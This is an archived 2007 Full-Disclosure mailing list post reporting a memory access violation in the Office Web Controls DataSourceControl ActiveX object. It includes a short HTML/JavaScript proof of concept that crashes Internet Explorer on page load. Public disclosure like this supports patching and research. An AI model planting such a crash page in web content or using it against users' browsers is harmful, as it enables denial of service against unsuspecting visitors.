[Full-disclosure] Office Web Controls DataSourceControl Memory Access Violation

Elazar Broad elazarb at earthlink.net
Sun Nov 11 06:01:04 GMT 2007


There is an un-handled memory access violation in the OWC11.DataSourceControl. As far as I know, I don't think it is possible to execute code via this, the worst it can do is crash Internet Explorer. PoC as follows:

------------------
<!--
written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
      var obj = new ActiveXObject("OWC11.DataSourceControl"); 
     
      obj.XMLDataTarget = "A";

 }
  </script>

 </head>  
 <body onload="JavaScript: return Check();" />
</html>
------------------

Elazar




Full-Disclosure is hosted and sponsored by Secunia.